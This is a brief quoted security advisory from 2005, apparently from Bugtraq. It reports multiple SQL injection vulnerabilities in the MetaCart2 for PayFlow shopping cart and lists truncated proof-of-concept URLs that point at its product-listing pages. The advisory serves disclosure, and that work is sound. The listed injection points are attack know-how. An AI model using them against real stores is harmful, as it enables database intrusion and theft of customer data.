QUOTE
Severity: High
Title: MetaCart2 for PayFlow Multiple Sql Injection Vulnerabilities
Date: 27/04/2005
Vendor: MetaCart
Vendor Website: http://metalinks.com
Proof of Concept Exploits:
http://example.com/mcart2pfp/productsByCat..._NAME=Computers
SQL INJECTION
http://example.com/mcart2pfp/productsByCat...og_NAME=Laptops
SQL INJECTION
http://example.com/mcart2pfp/productsByCat...og_NAME=Laptops
SQL INJECTION
http://example.com/mcart2pfp/productsByCat...9;SQL_INJECTION
SQL INJECTION
http://example.com/mcart2pfp/product.asp?i...9;SQL_INJECTION
SQL INJECTION
http://example.com/mcart2pfp/productsByCat...ON&%3bpage=2
SQL INJECTION
Author:
These vulnerabilties have been found and released by Diabolic Crab
Source: http://seclists.org/lists/bugtraq/2005/Apr/0429.html
